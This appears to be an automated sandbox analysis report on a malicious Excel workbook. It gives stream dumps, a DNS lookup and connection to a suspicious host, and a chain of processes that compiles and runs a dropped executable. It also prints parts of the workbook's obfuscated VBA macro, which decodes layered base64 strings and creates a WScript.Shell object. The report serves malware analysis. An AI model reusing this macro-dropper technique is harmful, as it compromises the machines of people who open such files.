| Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 88 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 04 00 00 00 40 00 00 00 08 00 00 00 50 00 00 00 0c 00 00 00 68 00 00 00 0d 00 00 00 74 00 00 00 13 00 00 00 80 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 55 73 65 72 00 00 00 00 |
Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 295749 |
|---|
General | |
|---|---|
| Stream Path: | Workbook |
| File Type: | Applesoft BASIC program data, first line number 16 |
| Stream Size: | 295749 |
| Entropy: | 7.70054289509 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . f E . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . M a r t i n a H o g n a s B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . . 8 . . . . . . |
| Data Raw: | 09 08 10 00 00 06 05 00 66 45 cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 0e 00 00 4d 61 72 74 69 6e 61 20 48 6f 67 6e 61 73 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 |
Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 794 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/PROJECT |
| File Type: | ASCII text, with CRLF line terminators |
| Stream Size: | 794 |
| Entropy: | 5.22529016655 |
| Base64 Encoded: | True |
| Data ASCII: | I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 3 . . C l a s s = C l a s s 1 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 1 . |
| Data Raw: | 49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30 |
Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 173 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/PROJECTwm |
| File Type: | data |
| Stream Size: | 173 |
| Entropy: | 3.35008863938 |
| Base64 Encoded: | False |
| Data ASCII: | T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . M o d u l e 3 . M . o . d . u . l . e . 3 . . . C l a s s 1 . C . l . a . s . s . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . . |
| Data Raw: | 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 4d 6f 64 75 6c 65 33 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 33 00 00 00 43 6c |
Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 4958 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/_VBA_PROJECT |
| File Type: | data |
| Stream Size: | 4958 |
| Entropy: | 5.01980154699 |
| Base64 Encoded: | False |
| Data ASCII: | . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . |
| Data Raw: | cc 61 b2 00 00 03 00 ff 09 08 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_0, File Type: data, Stream Size: 12464 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_0 |
| File Type: | data |
| Stream Size: | 12464 |
| Entropy: | 3.88854795332 |
| Base64 Encoded: | False |
| Data ASCII: | . K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . |
| Data Raw: | 93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 00 00 06 00 00 00 00 00 01 00 02 00 06 00 00 00 00 00 01 00 00 00 04 00 00 00 00 00 01 00 02 00 04 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 f4 06 00 00 00 00 00 00 80 00 00 00 00 00 00 00 40 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_1, File Type: data, Stream Size: 499 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_1 |
| File Type: | data |
| Stream Size: | 499 |
| Entropy: | 3.24182697916 |
| Base64 Encoded: | False |
| Data ASCII: | r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L d e J W B v . . . . . . . . . . . . . . . . A l S |
| Data Raw: | 72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_2, File Type: data, Stream Size: 4683 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_2 |
| File Type: | data |
| Stream Size: | 4683 |
| Entropy: | 3.78376292181 |
| Base64 Encoded: | False |
| Data ASCII: | r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . |
| Data Raw: | 72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 2a 00 00 00 e1 0c 00 00 00 00 00 00 00 00 00 00 f1 00 00 00 00 00 00 00 00 00 04 00 11 10 00 00 00 00 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_3, File Type: data, Stream Size: 422 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_3 |
| File Type: | data |
| Stream Size: | 422 |
| Entropy: | 2.31672880304 |
| Base64 Encoded: | False |
| Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . X . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . |
| Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 03 60 00 00 b9 08 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_4, File Type: data, Stream Size: 787 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_4 |
| File Type: | data |
| Stream Size: | 787 |
| Entropy: | 2.9224599407 |
| Base64 Encoded: | False |
| Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . a # . . . . . . . . . . . 6 . . . . . . . . . . . . . . . . . . | . . . . . . . g . . . . . g . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . |
| Data Raw: | 72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 05 00 10 00 00 00 00 00 00 00 00 00 04 00 02 00 02 00 05 00 00 00 71 02 00 00 00 00 00 00 00 00 06 00 91 17 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_5, File Type: data, Stream Size: 236 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_5 |
| File Type: | data |
| Stream Size: | 236 |
| Entropy: | 1.90397202124 |
| Base64 Encoded: | False |
| Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . |
| Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 04 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 20 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 04 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_6, File Type: data, Stream Size: 2979 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_6 |
| File Type: | data |
| Stream Size: | 2979 |
| Entropy: | 3.92348587039 |
| Base64 Encoded: | False |
| Data ASCII: | r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . ) . . . . . . . . . . Q . . . . . . . . . . . a . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . ! 1 . . . . . . . . . . 1 % . . . . . . . . . . . # . . . . . . . . . . Q & . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . 1 + |
| Data Raw: | 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 07 00 10 00 00 00 00 00 00 00 00 00 06 00 04 00 04 00 18 00 00 00 81 26 00 00 00 00 00 00 00 00 00 00 81 29 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/__SRP_7, File Type: data, Stream Size: 362 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/__SRP_7 |
| File Type: | data |
| Stream Size: | 362 |
| Entropy: | 2.1080960336 |
| Base64 Encoded: | False |
| Data ASCII: | r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . q . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . a . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . |
| Data Raw: | 72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 06 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 38 00 f1 00 00 00 00 00 00 00 00 00 06 00 00 00 00 60 00 00 fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 |
Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 918 |
|---|
General | |
|---|---|
| Stream Path: | _VBA_PROJECT_CUR/VBA/dir |
| File Type: | data |
| Stream Size: | 918 |
| Entropy: | 6.61630949995 |
| Base64 Encoded: | True |
| Data ASCII: | . . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . E . . Y . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . - |
| Data Raw: | 01 92 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 45 bf ea 59 16 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47 |
Network Behavior |
|---|
Network Port Distribution |
|---|
TCP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 12, 2017 10:21:59.858638048 CET | 58054 | 53 | 192.168.1.16 | 8.8.8.8 |
| Mar 12, 2017 10:22:00.188982010 CET | 53 | 58054 | 8.8.8.8 | 192.168.1.16 |
| Mar 12, 2017 10:22:00.217967033 CET | 49188 | 443 | 192.168.1.16 | 200.122.181.26 |
| Mar 12, 2017 10:22:00.218003988 CET | 443 | 49188 | 200.122.181.26 | 192.168.1.16 |
| Mar 12, 2017 10:22:00.218094110 CET | 49188 | 443 | 192.168.1.16 | 200.122.181.26 |
| Mar 12, 2017 10:22:00.218673944 CET | 49188 | 443 | 192.168.1.16 | 200.122.181.26 |
| Mar 12, 2017 10:22:00.218693972 CET | 443 | 49188 | 200.122.181.26 | 192.168.1.16 |
UDP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Mar 12, 2017 10:21:59.858638048 CET | 58054 | 53 | 192.168.1.16 | 8.8.8.8 |
| Mar 12, 2017 10:22:00.188982010 CET | 53 | 58054 | 8.8.8.8 | 192.168.1.16 |
DNS Queries |
|---|
| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
|---|---|---|---|---|---|---|---|
| Mar 12, 2017 10:21:59.858638048 CET | 192.168.1.16 | 8.8.8.8 | 0x550c | Standard query (0) | secure.dropinbox.pw | A (IP address) | IN (0x0001) |
DNS Answers |
|---|
| Timestamp | Source IP | Dest IP | Trans ID | Replay Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Mar 12, 2017 10:22:00.188982010 CET | 8.8.8.8 | 192.168.1.16 | 0x550c | No error (0) | secure.dropinbox.pw | 200.122.181.26 | A (IP address) | IN (0x0001) |
HTTP Request Dependency Graph |
|---|
|
HTTP Packets |
|---|
| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Header | Total Bytes Transfered (KB) |
|---|---|---|---|---|---|---|
| Mar 12, 2017 10:22:00.218673944 CET | 49188 | 443 | 192.168.1.16 | 200.122.181.26 | 0 |
Code Manipulations |
|---|
Statistics |
|---|
CPU Usage |
|---|
Click to jump to process
Memory Usage |
|---|
Click to jump to process
High Level Behavior Distribution |
|---|
back
Click to dive into process behavior distribution
Behavior |
|---|
Click to jump to process
System Behavior |
|---|
General |
|---|
| Start time: | 10:21:01 |
| Start date: | 12/03/2017 |
| Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x2fa20000 |
| File size: | 20753760 bytes |
| MD5 hash: | A53CC4C0FA7DA7CDC8DDDF4A0E6123F9 |
| Programmed in: | C, C++ or other language |
General |
|---|
| Start time: | 10:21:17 |
| Start date: | 12/03/2017 |
| Path: | C:\Windows\System32\cmd.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x49dd0000 |
| File size: | 302592 bytes |
| MD5 hash: | AD7B9C14083B52BC532FBA5948342B98 |
| Programmed in: | C, C++ or other language |
General |
|---|
| Start time: | 10:21:18 |
| Start date: | 12/03/2017 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x50000 |
| File size: | 2170512 bytes |
| MD5 hash: | A6E6251DFF7BB06CF53A5C0356E2B706 |
| Programmed in: | .Net C# or VB.NET |
General |
|---|
| Start time: | 10:21:19 |
| Start date: | 12/03/2017 |
| Path: | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0x74d40000 |
| File size: | 43184 bytes |
| MD5 hash: | A8C0B99B47DEEA88D5AC6D04821DEF99 |
| Programmed in: | C, C++ or other language |
General |
|---|
| Start time: | 10:21:20 |
| Start date: | 12/03/2017 |
| Path: | C:\Users\luketaylor\AppData\Roaming\Microsoft\ez2pft0p9dli.exe |
| Wow64 process (32bit): | false |
| Commandline: | |
| Imagebase: | 0xed0000 |
| File size: | 6144 bytes |
| MD5 hash: | AB1CD5F28672F07426C06BEE0C313EBA |
| Programmed in: | .Net C# or VB.NET |
Disassembly |
|---|
Code Analysis |
|---|
Call Graph |
|---|
Graph
- Entrypoint
- Decryption Function
- Executed
- Not Executed
- Show Help
Module: Class1 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Class1" |
| 2 | Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" |
| 3 | Attribute VB_GlobalNameSpace = False |
| 4 | Attribute VB_Creatable = False |
| 5 | Attribute VB_PredeclaredId = False |
| 6 | Attribute VB_Exposed = False |
| 7 | Attribute VB_TemplateDerived = False |
| 8 | Attribute VB_Customizable = False |
Module: Module1 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Module1" |
| 2 | Dim DrawingBoard |
Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
CreateObject | CreateObject("WScript.Shell") |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr |
| Strings | Decrypted Strings |
|---|---|
| "VjFOamNtbHdkQzVUYUdWc2JBPT0=" |
| Line | Instruction | Meta Information |
|---|---|---|
| 4 | Sub rpHTVPhPlNzeiOHkGWhPpSxNM() | |
| 5 | Set DrawingBoard = CreateObject(Module3.tpqfxxQMYW(Module3.tpqfxxQMYW("VjFOamNtbHdkQzVUYUdWc2JBPT0="))) | CreateObject("WScript.Shell") executed |
| 6 | End Sub |
| APIs | Meta Information |
|---|---|
ExpandEnvironmentStrings | IWshShell3.ExpandEnvironmentStrings("%APPDATA%") -> C:\Users\luketaylor\AppData\Roaming IWshShell3.ExpandEnvironmentStrings("%WINDIR%") -> C:\Windows |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbCrLf | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: vbTab | |
Part of subcall function tpqfxxQMYW@Module3: Replace | |
Part of subcall function tpqfxxQMYW@Module3: Len | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: InStr | |
Part of subcall function tpqfxxQMYW@Module3: vbBinaryCompare | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ly | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Ku | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: CByte | |
Part of subcall function tpqfxxQMYW@Module3: ChrW | |
Part of subcall function tpqfxxQMYW@Module3: Mid | |
Part of subcall function tpqfxxQMYW@Module3: Fu | |
Part of subcall function tpqfxxQMYW@Module3: Lu | |
Part of subcall function tpqfxxQMYW@Module3: Left | |
Part of subcall function tpqfxxQMYW@Module3: Chr |
| Line | Instruction | Meta Information |
|---|---|---|
| 8 | Public Function bRfcoUjl(ByVal aYbtfeVyiiwmVvl, ByVal iBUbeelVRf) | |
| 9 | bRfcoUjl = DrawingBoard.ExpandEnvironmentStrings(Module3.tpqfxxQMYW(Module3.tpqfxxQMYW(Module3.tpqfxxQMYW(aYbtfeVyiiwmVvl)))) | IWshShell3.ExpandEnvironmentStrings("%APPDATA%") -> C:\Users\luketaylor\AppData\Roaming executed |
| 10 | End Function |
Module: Module3 |
|---|
Declaration |
|---|
| Line | Content |
|---|---|
| 1 | Attribute VB_Name = "Module3" |
Executed Functions |
|---|
| APIs | Meta Information |
|---|---|
Replace | Replace("VjFOamNtbHdkQzVUYUdWc2JBPT0="," ","") -> VjFOamNtbHdkQzVUYUdWc2JBPT0= Replace("V1NjcmlwdC5TaGVsbA=="," ","") -> V1NjcmlwdC5TaGVsbA== Replace("VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09"," ","") -> VTJ4V1IxVldWa1pWYTBwWFVsVldjdz09 Replace("U2xWR1VWVkZVa0pXUlVWcw=="," ","") -> U2xWR1VWVkZVa0pXUlVWcw== Replace("SlVGUVVFUkJWRUVs"," ","") -> SlVGUVVFUkJWRUVs Replace("JUFQUERBVEEl"," ","") -> JUFQUERBVEEl Replace("V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09"," ","") -> V0VVeGNGa3pTblpqTWpsdFpFWjNQUT09 Replace("WEUxcFkzSnZjMjltZEZ3PQ=="," ","") -> WEUxcFkzSnZjMjltZEZ3PQ== Replace("XE1pY3Jvc29mdFw="," ","") -> XE1pY3Jvc29mdFw= Replace("TG1WNFpRPT0="," ","") -> TG1WNFpRPT0= Replace("LmV4ZQ=="," ","") -> LmV4ZQ== Replace("TG1Oeg=="," ","") -> TG1Oeg== Replace("LmNz"," ","") -> LmNz Replace("U2xaa1NsUnJVa3BWYVZVOQ=="," ","") -> U2xaa1NsUnJVa3BWYVZVOQ== Replace("SlZkSlRrUkpVaVU9"," ","") -> SlZkSlRrUkpVaVU9 Replace("JVdJTkRJUiU="," ","") -> 